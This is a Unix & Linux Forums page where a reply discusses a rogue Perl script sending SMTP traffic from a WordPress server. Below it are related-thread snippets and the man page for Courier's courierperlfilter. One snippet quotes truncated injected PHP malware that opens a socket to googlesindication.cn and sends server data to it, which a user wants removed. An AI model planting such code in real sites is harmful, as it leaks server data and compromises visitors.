Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Malicious perl script
Operating Systems Linux Debian Malicious perl script Post 302992395 by drysdalk on Friday 24th of February 2017 11:33:08 AM
Old 02-24-2017
Hi,

I suspect these are two different issues. So far you have seen evidence of attempted brute-forcing of your WordPress logins, and you also saw a Perl script establishing a variety of outbound SMTP connections back at the very start of this thread.

It is entirely possible that the two are related, but equally they may not be. There's always a steady trickle of would-be brute-forcing and exploit scanning in the logs of pretty much every Web server on the Internet, more or less. If your WordPress installation is genuinely secure, these should be nothing to worry about. More sinister is the Perl script.

If in the output of ps and top right now you're not able to see any errant Perl scripts, and if there is nothing Perl-related in any of your Web logs, then there's not much more you can do at this point to track down that Perl script.

What you can say for sure is that your server was clearly running an unexpected Perl script that appeared to be establishing a variety of outbound SMTP connections, and it must have come from somewhere. And if that somewhere wasn't you, then you do definitely have a security issue you still need to get to the bottom of.
 

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl... (1 Reply)
Discussion started by: grajp002
1 Replies

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies

LEARN ABOUT DEBIAN

courierperlfilter

COURIERPERLFILTER(8)					      Double Precision, Inc.					      COURIERPERLFILTER(8)

NAME

       courierperlfilter - Sample Perl-based mail filter

SYNOPSIS

       filterctl [[start] | [stop]] [perlfilter]

DESCRIPTION

       This is an example global mail filter that uses an embedded Perl script. "Embedded" means that the Perl interpreter is loaded once, and the
       same Perl code is repeatedly called to accept or reject incoming messages, one by one. Perl filtering is relatively time consuming
       (compared to filtering in C or C++), and excessive delays in mail filters result in incoming mail being deferred (rejected with a temporary
       error code). Therefore the perlfilter wrapper can create multiple perlfilter processes, so that multiple processes are used to filter
       incoming mail.

       perlfilter requires Perl 5.004 or higher. The best way to create a Perl filter is to start with the sample filter,
       /usr/lib/courier/perlfilter-example.pl. This filter reject messages that contain an excessively long Date: header (designed to crash
       certain poorly-written mail clients). Use it as a basis for writing your own filter. You can install your filter in any convenient
       location, then initialize the /etc/courier/filters/perlfilter configuration file, as described below. Run filterctl start perlfilter to
       activate filtering (if necessary, run courierfilter start to start the mail filtering subsystem).

   Setting up a Perl script
       Most of the ugly details of connecting the Perl script to Courier's mail filtering engine is taken care of by the sample
       perlfilter-example.pl script. One big no-no: the script MAY NOT change the current directory. Anything else goes, for the most part.
       Loading other modules and classes, pretty much anything else you can do with Perl, is allowed.

       The Perl script, just like any other mail filtering module, receives a pointer to a data file and one or more control files, each time a
       message is submitted to Courier for delivery. The sample script calls the filterdata() function to process the data file. The data file
       contains the actual message. The filtercontrol() function is called to process each control file. The control file contains recipient and
       message metadata. There may be more than one control file for each message. The example script includes an implementation of filterdata()
       that blocks messages with corrupted headers. The example script doesn't do anything interesting with filtercontrol().

       filterdata() and filtercontrol() must return an empty string if no serious objections are raised for this message. Any other return string
       is interpreted as an SMTP-style error code that is used to reject the message. Care must be taken that any error messages are formatted
       strictly according to the format of SMTP error messages (even though the message may not actually come in via SMTP).

CREDITS

       A lot of the Perl glue code is based on examples from the perlembed manual page, and other sources.

FILES

       perlfilter uses the following configuration files. Changes to the following files do not take effect until the filter has been stopped and
       restarted.

       /etc/courier/filters/perlfilter-mode
	   If this file exists and contains the word "all", perlfilter will create its socket in /var/lib/courier/allfilters, otherwise the socket
	   will be created in /var/lib/courier/filters, see courierfilter(8)[1] for more information.

       /etc/courier/filters/perlfilter-numprocs
	   This file contains a number that sets how many perlfilter processes are created. The default is 5 processes. There's always an extra
	   perlfilter process that's used to clean up crashed child processes.

       /etc/courier/filters/perlfilter
	   This file MUST exist and it must contain a single line of text with the filename of the Perl script to load.

       /usr/lib/courier/perlfilter-example.pl
	   This is a sample Perl script of the kind that /etc/courier/filters/perlfilter points to. Use it as an example of writing your own Perl
	   filters.

       Please exercise good judgment in writing Perl-based filters. They should be reasonably fast, and do not allocate megabytes of memory. They
       should not be very promiscuous in creating global Perl variables, and should clean up after themselves. The current Perl wrapper does not
       destroy the Perl symbol table after each call to the filter script. However, do not take that for granted. This may change in the future.

SEE ALSO

       courierfilter(8)[1].

AUTHOR

       Sam Varshavchik
	   Author

NOTES

	1. courierfilter(8)
	   [set $man.base.url.for.relative.links]/courierfilter.html

Courier Mail Server						    04/04/2011						      COURIERPERLFILTER(8)
All times are GMT -4. The time now is 04:44 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy